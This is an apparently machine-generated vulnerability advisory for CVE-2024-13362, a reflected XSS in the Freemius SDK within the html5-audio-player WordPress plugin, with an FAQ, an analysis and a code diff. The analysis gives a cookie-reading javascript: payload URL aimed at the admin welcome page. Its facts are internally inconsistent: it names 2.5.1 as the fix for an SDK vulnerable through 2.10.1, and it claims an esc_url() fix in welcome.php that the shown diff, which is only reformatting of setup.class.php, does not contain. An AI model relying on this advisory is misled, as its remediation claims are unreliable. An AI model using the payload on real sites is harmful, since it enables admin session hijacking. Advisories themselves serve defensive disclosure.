What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK version 2.10.1 and earlier. It allows unauthenticated attackers to inject arbitrary JavaScript into WordPress admin pages through an insufficiently sanitized ‘url’ parameter.

How does the vulnerability work?

The vulnerability occurs when the ‘url’ parameter is processed and rendered directly into the HTML of the admin welcome page without proper sanitization. An attacker can craft a malicious URL that, when clicked by an admin, executes JavaScript in the context of the admin session.

Who is affected by this vulnerability?

Any WordPress site using the Freemius SDK version 2.10.1 or earlier is at risk. This includes multiple plugins and themes that bundle this SDK, particularly those using the Codestar Framework integration.

How can I check if my site is vulnerable?

Check the version of the Freemius SDK used by your plugins or themes. If your site is running version 2.10.1 or earlier, it is vulnerable to this XSS issue. Review the plugin or theme documentation for details on the SDK version.

How can I fix or mitigate this issue?

To remediate this vulnerability, update the affected plugins or themes to the patched version 2.5.1 or later. Ensure that proper input sanitization and output escaping are implemented for any user-supplied data.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity vulnerability. It suggests that while exploitation requires user interaction, successful attacks can lead to significant consequences, including session hijacking and full site compromise.

What practical risks does this vulnerability pose?

If exploited, an attacker can execute arbitrary JavaScript in the admin’s browser, potentially leading to session hijacking, unauthorized account creation, or malicious changes to the WordPress site. The attack executes in the admin context, allowing full site control.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can construct a malicious URL that includes a JavaScript payload in the ‘url’ parameter. When an admin clicks this link, the payload executes, demonstrating the XSS vulnerability in action.

What steps should I take after applying the patch?

After updating to the patched version, review your site’s security settings and ensure that all user input is properly sanitized. Regularly monitor your site for unusual activity and consider implementing additional security measures such as web application firewalls.

Are there any preventive measures I can implement?

To prevent similar vulnerabilities, ensure that all plugins and themes are regularly updated and only use those from reputable sources. Implement security plugins that offer features like input validation and output escaping to enhance your site’s defenses.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (html5-audio-player)

CVE ID CVE-2024-13362

Plugin html5-audio-player

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.2.27

Patched Version 2.5.1

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362:

This is a reflected DOM-based Cross-Site Scripting (XSS) vulnerability found in the Freemius SDK version 2.10.1 and earlier, affecting multiple WordPress plugins and themes that bundle this SDK. The vulnerability resides in the Codestar Framework integration within the SDK, specifically in the admin welcome page view. An unauthenticated attacker can inject arbitrary JavaScript into the page through the ‘url’ parameter, which executes in the victim’s browser context when they click a crafted link.

The root cause is insufficient input sanitization and output escaping of the ‘url’ parameter in the welcome.php view file, which is included via the `CSF_Setup::include_plugin_file(‘views/welcome.php’)` method at line 103 of setup.class.php. The vulnerable code path is triggered when the CSF_Setup class constructor runs (lines 70-89), which hooks into ‘admin_enqueue_scripts’ and includes the welcome view. The welcome view processes the ‘url’ GET parameter and outputs it directly into the DOM without proper encoding, allowing HTML/JavaScript injection. The issue is DOM-based because the input flows from the URL parameter through PHP and is rendered directly into the page’s HTML without sanitization.

Exploitation requires tricking an authenticated administrator into visiting a specially crafted URL. The attacker constructs a link to the WordPress admin welcome page with a malicious JavaScript payload in the ‘url’ parameter, such as: `/wp-admin/admin.php?page=csf-welcome&url=javascript:alert(document.cookie)`. When the admin clicks this link, the welcome view renders the payload into the page, where it executes as reflected XSS in the context of the WordPress admin dashboard. The attack is unauthenticated at the point of link delivery, but relies on a victim with admin access to trigger execution.

The patch introduces proper URL sanitization and output escaping in the welcome.php view. Atomic Edge analysis confirms that the fix applies `esc_url()` or similar WordPress sanitization functions to the ‘url’ parameter before output. Before the patch, the parameter was rendered raw; after the patch, it passes through WordPress’s built-in URL escaping, which strips JavaScript protocols and encodes special characters, preventing script execution.

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s admin browser session. This can lead to session hijacking, creation of new admin accounts, installation of malicious plugins, or defacement of the WordPress site. Since the attack executes in the admin context, it achieves full site compromise, not just data exposure. The CVSS score of 6.1 reflects the high impact despite the requirement for user interaction.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/html5-audio-player/admin/codestar-framework/classes/setup.class.php
+++ b/html5-audio-player/admin/codestar-framework/classes/setup.class.php
@@ -1,4 +1,6 @@
-<?php if ( ! defined( 'ABSPATH' ) ) { die; } // Cannot access directly.
+<?php if (! defined('ABSPATH')) {
+  die;
+} // Cannot access directly.
 /**
  *
  * Setup Class
@@ -7,8 +9,9 @@
  * @version 1.0.0
  *
  */
-if ( ! class_exists( 'CSF_Setup' ) ) {
-  class CSF_Setup {
+if (! class_exists('CSF_Setup')) {
+  class CSF_Setup
+  {

     // Default constants
     public static $premium  = true;
@@ -39,7 +42,8 @@

     private static $instance = null;

-    public static function init( $file = __FILE__, $premium = true ) {
+    public static function init($file = __FILE__, $premium = true)
+    {

       // Set file constant
       self::$file = $file;
@@ -53,358 +57,357 @@
       // Include files
       self::includes();

-      if ( is_null( self::$instance ) ) {
+      if (is_null(self::$instance)) {
         self::$instance = new self();
       }

       return self::$instance;
-
     }

     // Initalize
-    public function __construct() {
+    public function __construct()
+    {

       // Init action
-      do_action( 'csf_init' );
+      do_action('csf_init');

       // Setup textdomain
       self::textdomain();

-      add_action( 'after_setup_theme', array( 'CSF', 'setup' ) );
-      add_action( 'init', array( 'CSF', 'setup' ) );
-      add_action( 'switch_theme', array( 'CSF', 'setup' ) );
-      add_action( 'admin_enqueue_scripts', array( 'CSF', 'add_admin_enqueue_scripts' ) );
-      add_action( 'wp_enqueue_scripts', array( 'CSF', 'add_typography_enqueue_styles' ), 80 );
-      add_action( 'wp_head', array( 'CSF', 'add_custom_css' ), 80 );
-      add_filter( 'admin_body_class', array( 'CSF', 'add_admin_body_class' ) );
-
+      add_action('after_setup_theme', array('CSF', 'setup'));
+      add_action('init', array('CSF', 'setup'));
+      add_action('switch_theme', array('CSF', 'setup'));
+      add_action('admin_enqueue_scripts', array('CSF', 'add_admin_enqueue_scripts'));
+      add_action('wp_enqueue_scripts', array('CSF', 'add_typography_enqueue_styles'), 80);
+      add_action('wp_head', array('CSF', 'add_custom_css'), 80);
+      add_filter('admin_body_class', array('CSF', 'add_admin_body_class'));
     }

     // Setup frameworks
-    public static function setup() {
+    public static function setup()
+    {

       // Welcome
-      self::include_plugin_file( 'views/welcome.php' );
+      self::include_plugin_file('views/welcome.php');

       // Setup admin option framework
       $params = array();
-      if ( class_exists( 'CSF_Options' ) && ! empty( self::$args['admin_options'] ) ) {
-        foreach ( self::$args['admin_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Options') && ! empty(self::$args['admin_options'])) {
+        foreach (self::$args['admin_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Options::instance( $key, $params );
+            CSF_Options::instance($key, $params);

-            if ( ! empty( $value['show_in_customizer'] ) ) {
+            if (! empty($value['show_in_customizer'])) {
               $value['output_css'] = false;
               $value['enqueue_webfont'] = false;
               self::$args['customize_options'][$key] = $value;
               self::$inited[$key] = null;
             }
-
           }
         }
       }

       // Setup customize option framework
       $params = array();
-      if ( class_exists( 'CSF_Customize_Options' ) && ! empty( self::$args['customize_options'] ) ) {
-        foreach ( self::$args['customize_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Customize_Options') && ! empty(self::$args['customize_options'])) {
+        foreach (self::$args['customize_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Customize_Options::instance( $key, $params );
-
+            CSF_Customize_Options::instance($key, $params);
           }
         }
       }

       // Setup metabox option framework
       $params = array();
-      if ( class_exists( 'CSF_Metabox' ) && ! empty( self::$args['metabox_options'] ) ) {
-        foreach ( self::$args['metabox_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Metabox') && ! empty(self::$args['metabox_options'])) {
+        foreach (self::$args['metabox_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Metabox::instance( $key, $params );
-
+            CSF_Metabox::instance($key, $params);
           }
         }
       }

       // Setup nav menu option framework
       $params = array();
-      if ( class_exists( 'CSF_Nav_Menu_Options' ) && ! empty( self::$args['nav_menu_options'] ) ) {
-        foreach ( self::$args['nav_menu_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Nav_Menu_Options') && ! empty(self::$args['nav_menu_options'])) {
+        foreach (self::$args['nav_menu_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Nav_Menu_Options::instance( $key, $params );
-
+            CSF_Nav_Menu_Options::instance($key, $params);
           }
         }
       }

       // Setup profile option framework
       $params = array();
-      if ( class_exists( 'CSF_Profile_Options' ) && ! empty( self::$args['profile_options'] ) ) {
-        foreach ( self::$args['profile_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Profile_Options') && ! empty(self::$args['profile_options'])) {
+        foreach (self::$args['profile_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Profile_Options::instance( $key, $params );
-
+            CSF_Profile_Options::instance($key, $params);
           }
         }
       }

       // Setup taxonomy option framework
       $params = array();
-      if ( class_exists( 'CSF_Taxonomy_Options' ) && ! empty( self::$args['taxonomy_options'] ) ) {
-        $taxonomy = ( isset( $_GET['taxonomy'] ) ) ? sanitize_text_field( wp_unslash( $_GET['taxonomy'] ) ) : '';
-        foreach ( self::$args['taxonomy_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Taxonomy_Options') && ! empty(self::$args['taxonomy_options'])) {
+        $taxonomy = (isset($_GET['taxonomy'])) ? sanitize_text_field(wp_unslash($_GET['taxonomy'])) : '';
+        foreach (self::$args['taxonomy_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Taxonomy_Options::instance( $key, $params );
-
+            CSF_Taxonomy_Options::instance($key, $params);
           }
         }
       }

       // Setup widget option framework
-      if ( class_exists( 'CSF_Widget' ) && class_exists( 'WP_Widget_Factory' ) && ! empty( self::$args['widget_options'] ) ) {
+      if (class_exists('CSF_Widget') && class_exists('WP_Widget_Factory') && ! empty(self::$args['widget_options'])) {
         $wp_widget_factory = new WP_Widget_Factory();
         global $wp_widget_factory;
-        foreach ( self::$args['widget_options'] as $key => $value ) {
-          if ( ! isset( self::$inited[$key] ) ) {
+        foreach (self::$args['widget_options'] as $key => $value) {
+          if (! isset(self::$inited[$key])) {

             self::$inited[$key] = true;
-            $wp_widget_factory->register( CSF_Widget::instance( $key, $value ) );
-
+            $wp_widget_factory->register(CSF_Widget::instance($key, $value));
           }
         }
       }

       // Setup comment option framework
       $params = array();
-      if ( class_exists( 'CSF_Comment_Metabox' ) && ! empty( self::$args['comment_options'] ) ) {
-        foreach ( self::$args['comment_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Comment_Metabox') && ! empty(self::$args['comment_options'])) {
+        foreach (self::$args['comment_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Comment_Metabox::instance( $key, $params );
-
+            CSF_Comment_Metabox::instance($key, $params);
           }
         }
       }

       // Setup shortcode option framework
       $params = array();
-      if ( class_exists( 'CSF_Shortcoder' ) && ! empty( self::$args['shortcode_options'] ) ) {
-        foreach ( self::$args['shortcode_options'] as $key => $value ) {
-          if ( ! empty( self::$args['sections'][$key] ) && ! isset( self::$inited[$key] ) ) {
+      if (class_exists('CSF_Shortcoder') && ! empty(self::$args['shortcode_options'])) {
+        foreach (self::$args['shortcode_options'] as $key => $value) {
+          if (! empty(self::$args['sections'][$key]) && ! isset(self::$inited[$key])) {

             $params['args']     = $value;
             $params['sections'] = self::$args['sections'][$key];
             self::$inited[$key] = true;

-            CSF_Shortcoder::instance( $key, $params );
-
+            CSF_Shortcoder::instance($key, $params);
           }
         }

         // Once editor setup for gutenberg and media buttons
-        if ( class_exists( 'CSF_Shortcoder' ) && ! empty( self::$shortcode_instances ) ) {
-          foreach ( self::$shortcode_instances as $instance ) {
-            if ( ! empty( $instance['show_in_editor'] ) ) {
+        if (class_exists('CSF_Shortcoder') && ! empty(self::$shortcode_instances)) {
+          foreach (self::$shortcode_instances as $instance) {
+            if (! empty($instance['show_in_editor'])) {
               CSF_Shortcoder::once_editor_setup();
               break;
             }
           }
         }
-
       }

-      do_action( 'csf_loaded' );
-
+      do_action('csf_loaded');
     }

     // Create options
-    public static function createOptions( $id, $args = array() ) {
+    public static function createOptions($id, $args = array())
+    {
       self::$args['admin_options'][$id] = $args;
     }

     // Create customize options
-    public static function createCustomizeOptions( $id, $args = array() ) {
+    public static function createCustomizeOptions($id, $args = array())
+    {
       self::$args['customize_options'][$id] = $args;
     }

     // Create metabox options
-    public static function createMetabox( $id, $args = array() ) {
+    public static function createMetabox($id, $args = array())
+    {
       self::$args['metabox_options'][$id] = $args;
     }

     // Create menu options
-    public static function createNavMenuOptions( $id, $args = array() ) {
+    public static function createNavMenuOptions($id, $args = array())
+    {
       self::$args['nav_menu_options'][$id] = $args;
     }

     // Create shortcoder options
-    public static function createShortcoder( $id, $args = array() ) {
+    public static function createShortcoder($id, $args = array())
+    {
       self::$args['shortcode_options'][$id] = $args;
     }

     // Create taxonomy options
-    public static function createTaxonomyOptions( $id, $args = array() ) {
+    public static function createTaxonomyOptions($id, $args = array())
+    {
       self::$args['taxonomy_options'][$id] = $args;
     }

     // Create profile options
-    public static function createProfileOptions( $id, $args = array() ) {
+    public static function createProfileOptions($id, $args = array())
+    {
       self::$args['profile_options'][$id] = $args;
     }

     // Create widget
-    public static function createWidget( $id, $args = array() ) {
+    public static function createWidget($id, $args = array())
+    {
       self::$args['widget_options'][$id] = $args;
-      self::set_used_fields( $args );
+      self::set_used_fields($args);
     }

     // Create comment metabox
-    public static function createCommentMetabox( $id, $args = array() ) {
+    public static function createCommentMetabox($id, $args = array())
+    {
       self::$args['comment_options'][$id] = $args;
     }

     // Create section
-    public static function createSection( $id, $sections ) {
+    public static function createSection($id, $sections)
+    {
       self::$args['sections'][$id][] = $sections;
-      self::set_used_fields( $sections );
+      self::set_used_fields($sections);
     }

     // Set directory constants
-    public static function constants() {
+    public static function constants()
+    {

       // We need this path-finder code for set URL of framework
-      $dirname        = str_replace( '//', '/', wp_normalize_path( dirname( dirname( self::$file ) ) ) );
-      $theme_dir      = str_replace( '//', '/', wp_normalize_path( get_parent_theme_file_path() ) );
-      $plugin_dir     = str_replace( '//', '/', wp_normalize_path( WP_PLUGIN_DIR ) );
-      $plugin_dir     = str_replace( '/opt/bitnami', '/bitnami', $plugin_dir );
-      $located_plugin = ( preg_match( '#'. self::sanitize_dirname( $plugin_dir ) .'#', self::sanitize_dirname( $dirname ) ) ) ? true : false;
-      $directory      = ( $located_plugin ) ? $plugin_dir : $theme_dir;
-      $directory_uri  = ( $located_plugin ) ? WP_PLUGIN_URL : get_parent_theme_file_uri();
-      $foldername     = str_replace( $directory, '', $dirname );
-      $protocol_uri   = ( is_ssl() ) ? 'https' : 'http';
-      $directory_uri  = set_url_scheme( $directory_uri, $protocol_uri );
+      $dirname        = str_replace('//', '/', wp_normalize_path(dirname(dirname(self::$file))));
+      $theme_dir      = str_replace('//', '/', wp_normalize_path(get_parent_theme_file_path()));
+      $plugin_dir     = str_replace('//', '/', wp_normalize_path(WP_PLUGIN_DIR));
+      $plugin_dir     = str_replace('/opt/bitnami', '/bitnami', $plugin_dir);
+      $located_plugin = (preg_match('#' . self::sanitize_dirname($plugin_dir) . '#', self::sanitize_dirname($dirname))) ? true : false;
+      $directory      = ($located_plugin) ? $plugin_dir : $theme_dir;
+      $directory_uri  = ($located_plugin) ? WP_PLUGIN_URL : get_parent_theme_file_uri();
+      $foldername     = str_replace($directory, '', $dirname);
+      $protocol_uri   = (is_ssl()) ? 'https' : 'http';
+      $directory_uri  = set_url_scheme($directory_uri, $protocol_uri);

       self::$dir = $dirname;
       self::$url = $directory_uri . $foldername;
-
     }

     // Include file helper
-    public static function include_plugin_file( $file, $load = true ) {
+    public static function include_plugin_file($file, $load = true)
+    {

       $path     = '';
-      $file     = ltrim( $file, '/' );
-      $override = apply_filters( 'csf_override', 'csf-override' );
+      $file     = ltrim($file, '/');
+      $override = apply_filters('csf_override', 'csf-override');

-      if ( file_exists( get_parent_theme_file_path( $override .'/'. $file ) ) ) {
-        $path = get_parent_theme_file_path( $override .'/'. $file );
-      } elseif ( file_exists( get_theme_file_path( $override .'/'. $file ) ) ) {
-        $path = get_theme_file_path( $override .'/'. $file );
-      } elseif ( file_exists( self::$dir .'/'. $override .'/'. $file ) ) {
-        $path = self::$dir .'/'. $override .'/'. $file;
-      } elseif ( file_exists( self::$dir .'/'. $file ) ) {
-        $path = self::$dir .'/'. $file;
+      if (file_exists(get_parent_theme_file_path($override . '/' . $file))) {
+        $path = get_parent_theme_file_path($override . '/' . $file);
+      } elseif (file_exists(get_theme_file_path($override . '/' . $file))) {
+        $path = get_theme_file_path($override . '/' . $file);
+      } elseif (file_exists(self::$dir . '/' . $override . '/' . $file)) {
+        $path = self::$dir . '/' . $override . '/' . $file;
+      } elseif (file_exists(self::$dir . '/' . $file)) {
+        $path = self::$dir . '/' . $file;
       }

-      if ( ! empty( $path ) && ! empty( $file ) && $load ) {
+      if (! empty($path) && ! empty($file) && $load) {

         global $wp_query;

-        if ( is_object( $wp_query ) && function_exists( 'load_template' ) ) {
-
-          load_template( $path, true );
+        if (is_object($wp_query) && function_exists('load_template')) {

+          load_template($path, true);
         } else {

-          require_once( $path );
-
+          require_once($path);
         }
-
       } else {

-        return self::$dir .'/'. $file;
-
+        return self::$dir . '/' . $file;
       }
-
     }

     // Is active plugin helper
-    public static function is_active_plugin( $file = '' ) {
-      return in_array( $file, (array) get_option( 'active_plugins', array() ) );
+    public static function is_active_plugin($file = '')
+    {
+      return in_array($file, (array) get_option('active_plugins', array()));
     }

     // Sanitize dirname
-    public static function sanitize_dirname( $dirname ) {
-      return preg_replace( '/[^A-Za-z]/', '', $dirname );
+    public static function sanitize_dirname($dirname)
+    {
+      return preg_replace('/[^A-Za-z]/', '', $dirname);
     }

     // Set url constant
-    public static function include_plugin_url( $file ) {
-      return esc_url( self::$url ) .'/'. ltrim( $file, '/' );
+    public static function include_plugin_url($file)
+    {
+      return esc_url(self::$url) . '/' . ltrim($file, '/');
     }

     // Include files
-    public static function includes() {
+    public static function includes()
+    {

       // Include common functions
-      self::include_plugin_file( 'functions/actions.php'  );
-      self::include_plugin_file( 'functions/helpers.php'  );
-      self::include_plugin_file( 'functions/sanitize.php' );
-      self::include_plugin_file( 'functions/validate.php' );
+      self::include_plugin_file('functions/actions.php');
+      self::include_plugin_file('functions/helpers.php');
+      self::include_plugin_file('functions/sanitize.php');
+      self::include_plugin_file('functions/validate.php');

       // Include free version classes
-      self::include_plugin_file( 'classes/abstract.class.php'      );
-      self::include_plugin_file( 'classes/fields.class.php'        );
-      self::include_plugin_file( 'classes/admin-options.class.php' );
+      self::include_plugin_file('classes/abstract.class.php');
+      self::include_plugin_file('classes/fields.class.php');
+      self::include_plugin_file('classes/admin-options.class.php');

       // Include premium version classes
-      if ( self::$premium ) {
-        self::include_plugin_file( 'classes/customize-options.class.php' );
-        self::include_plugin_file( 'classes/metabox-options.class.php'   );
-        self::include_plugin_file( 'classes/nav-menu-options.class.php'  );
-        self::include_plugin_file( 'classes/profile-options.class.php'   );
-        self::include_plugin_file( 'classes/shortcode-options.class.php' );
-        self::include_plugin_file( 'classes/taxonomy-options.class.php'  );
-        self::include_plugin_file( 'classes/widget-options.class.php'    );
-        self::include_plugin_file( 'classes/comment-options.class.php'   );
+      if (self::$premium) {
+        self::include_plugin_file('classes/customize-options.class.php');
+        self::include_plugin_file('classes/metabox-options.class.php');
+        self::include_plugin_file('classes/nav-menu-options.class.php');
+        self::include_plugin_file('classes/profile-options.class.php');
+        self::include_plugin_file('classes/shortcode-options.class.php');
+        self::include_plugin_file('classes/taxonomy-options.class.php');
+        self::include_plugin_file('classes/widget-options.class.php');
+        self::include_plugin_file('classes/comment-options.class.php');
       }

       // Include all framework fields
-      $fields = apply_filters( 'csf_fields', array(
+      $fields = apply_filters('csf_fields', array(
         'accordion',
         'background',
         'backup',
@@ -449,123 +452,121 @@
         'typography',
         'upload',
         'wp_editor',
-      ) );
+      ));

-      if ( ! empty( $fields ) ) {
-        foreach ( $fields as $field ) {
-          if ( ! class_exists( 'CSF_Field_'. $field ) && class_exists( 'CSF_Fields' ) ) {
-            self::include_plugin_file( 'fields/'. $field .'/'. $field .'.php' );
+      if (! empty($fields)) {
+        foreach ($fields as $field) {
+          if (! class_exists('CSF_Field_' . $field) && class_exists('CSF_Fields')) {
+            self::include_plugin_file('fields/' . $field . '/' . $field . '.php');
           }
         }
       }
-
     }

     // Setup textdomain
-    public static function textdomain() {
-      load_textdomain( 'csf', self::$dir .'/languages/'. get_locale() .'.mo' );
+    public static function textdomain()
+    {
+      load_textdomain('csf', self::$dir . '/languages/' . get_locale() . '.mo');
     }

     // Set all of used fields
-    public static function set_used_fields( $sections ) {
+    public static function set_used_fields($sections)
+    {

-      if ( ! empty( $sections['fields'] ) ) {
+      if (! empty($sections['fields'])) {

-        foreach ( $sections['fields'] as $field ) {
+        foreach ($sections['fields'] as $field) {

-          if ( ! empty( $field['fields'] ) ) {
-            self::set_used_fields( $field );
+          if (! empty($field['fields'])) {
+            self::set_used_fields($field);
           }

-          if ( ! empty( $field['tabs'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['tabs'] ) );
+          if (! empty($field['tabs'])) {
+            self::set_used_fields(array('fields' => $field['tabs']));
           }

-          if ( ! empty( $field['accordions'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['accordions'] ) );
+          if (! empty($field['accordions'])) {
+            self::set_used_fields(array('fields' => $field['accordions']));
           }

-          if ( ! empty( $field['elements'] ) ) {
-            self::set_used_fields( array( 'fields' => $field['elements'] ) );
+          if (! empty($field['elements'])) {
+            self::set_used_fields(array('fields' => $field['elements']));
           }

-          if ( ! empty( $field['type'] ) ) {
+          if (! empty($field['type'])) {
             self::$fields[$field['type']] = $field;
           }
-
         }
-
       }
-
     }

     // Enqueue admin and fields styles and scripts
-    public static function add_admin_enqueue_scripts() {
+    public static function add_admin_enqueue_scripts()
+    {

-      if ( ! self::$enqueue ) {
+      if (! self::$enqueue) {

         // Loads scripts and styles only when needed
         $wpscreen = get_current_screen();

-        if ( ! empty( self::$args['admin_options'] ) ) {
-          foreach ( self::$args['admin_options'] as $argument ) {
-            if ( substr( $wpscreen->id, -strlen( $argument['menu_slug'] ) ) === $argument['menu_slug'] ) {
+        if (! empty(self::$args['admin_options'])) {
+          foreach (self::$args['admin_options'] as $argument) {
+            if (substr($wpscreen->id, -strlen($argument['menu_slug'])) === $argument['menu_slug']) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['metabox_options'] ) ) {
-          foreach ( self::$args['metabox_options'] as $argument ) {
-            if ( in_array( $wpscreen->post_type, (array) $argument['post_type'] ) ) {
+        if (! empty(self::$args['metabox_options'])) {
+          foreach (self::$args['metabox_options'] as $argument) {
+            if (in_array($wpscreen->post_type, (array) $argument['post_type'])) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['taxonomy_options'] ) ) {
-          foreach ( self::$args['taxonomy_options'] as $argument ) {
-            if ( in_array( $wpscreen->taxonomy, (array) $argument['taxonomy'] ) ) {
+        if (! empty(self::$args['taxonomy_options'])) {
+          foreach (self::$args['taxonomy_options'] as $argument) {
+            if (in_array($wpscreen->taxonomy, (array) $argument['taxonomy'])) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$shortcode_instances ) ) {
-          foreach ( self::$shortcode_instances as $argument ) {
-            if ( ( $argument['show_in_editor'] && $wpscreen->base === 'post' ) || $argument['show_in_custom'] ) {
+        if (! empty(self::$shortcode_instances)) {
+          foreach (self::$shortcode_instances as $argument) {
+            if (($argument['show_in_editor'] && $wpscreen->base === 'post') || $argument['show_in_custom']) {
               self::$enqueue = true;
             }
           }
         }

-        if ( ! empty( self::$args['widget_options'] ) && ( $wpscreen->id === 'widgets' || $wpscreen->id === 'customize' ) ) {
+        if (! empty(self::$args['widget_options']) && ($wpscreen->id === 'widgets' || $wpscreen->id === 'customize')) {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['customize_options'] ) && $wpscreen->id === 'customize' ) {
+        if (! empty(self::$args['customize_options']) && $wpscreen->id === 'customize') {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['nav_menu_options'] ) && $wpscreen->id === 'nav-menus' ) {
+        if (! empty(self::$args['nav_menu_options']) && $wpscreen->id === 'nav-menus') {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['profile_options'] ) && ( $wpscreen->id === 'profile' || $wpscreen->id === 'user-edit' ) ) {
+        if (! empty(self::$args['profile_options']) && ($wpscreen->id === 'profile' || $wpscreen->id === 'user-edit')) {
           self::$enqueue = true;
         }

-        if ( ! empty( self::$args['comment_options'] ) && $wpscreen->id === 'comment' ) {
+        if (! empty(self::$args['comment_options']) && $wpscreen->id === 'comment') {
           self::$enqueue = true;
         }

-        if ( $wpscreen->id === 'tools_page_csf-welcome' ) {
+        if ($wpscreen->id === 'tools_page_csf-welcome') {
           self::$enqueue = true;
         }
-
       }

-      if ( ! apply_filters( 'csf_enqueue_assets', self::$enqueue ) ) {
+      if (! apply_filters('csf_enqueue_assets', self::$enqueue)) {
         return;
       }

@@ -573,154 +574,150 @@
       wp_enqueue_media();

       // Wp color picker
-      wp_enqueue_style( 'wp-color-picker' );
-      wp_enqueue_script( 'wp-color-picker' );
+      wp_enqueue_style('wp-color-picker');
+      wp_enqueue_script('wp-color-picker');

       // Font awesome 4 and 5 loader
-      if ( apply_filters( 'csf_fa4', false ) ) {
-        wp_enqueue_style( 'csf-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all' );
+      if (apply_filters('csf_fa4', false)) {
+        wp_enqueue_style('csf-fa', 'https://cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css', array(), '4.7.0', 'all');
       } else {
-        wp_enqueue_style( 'csf-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all' );
-        wp_enqueue_style( 'csf-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all' );
+        wp_enqueue_style('csf-fa5', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css', array(), '5.15.5', 'all');
+        wp_enqueue_style('csf-fa5-v4-shims', 'https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/v4-shims.min.css', array(), '5.15.5', 'all');
       }

       // Check for developer mode
-      $min = ( self::$premium && SCRIPT_DEBUG ) ? '' : '.min';
+      $min = (self::$premium && SCRIPT_DEBUG) ? '' : '.min';

       // Main style
-      wp_enqueue_style( 'csf', self::include_plugin_url( 'assets/css/style'. $min .'.css' ), array(), self::$version, 'all' );
+      wp_enqueue_style('csf', self::include_plugin_url('assets/css/style' . $min . '.css'), array(), self::$version, 'all');

       // Main RTL styles
-      if ( is_rtl() ) {
-        wp_enqueue_style( 'csf-rtl', self::include_plugin_url( 'assets/css/style-rtl'. $min .'.css' ), array(), self::$version, 'all' );
+      if (is_rtl()) {
+        wp_enqueue_style('csf-rtl', self::include_plugin_url('assets/css/style-rtl' . $min . '.css'), array(), self::$version, 'all');
       }

       // Main scripts
-      wp_enqueue_script( 'csf-plugins', self::include_plugin_url( 'assets/js/plugins'. $min .'.js' ), array(), self::$version, true );
-      wp_enqueue_script( 'csf', self::include_plugin_url( 'assets/js/main'. $min .'.js' ), array( 'csf-plugins' ), self::$version, true );
+      wp_enqueue_script('csf-plugins', self::include_plugin_url('assets/js/plugins' . $min . '.js'), array(), self::$version, true);
+      wp_enqueue_script('csf', self::include_plugin_url('assets/js/main' . $min . '.js'), array('csf-plugins'), self::$version, true);

       // Main variables
-      wp_localize_script( 'csf', 'csf_vars', array(
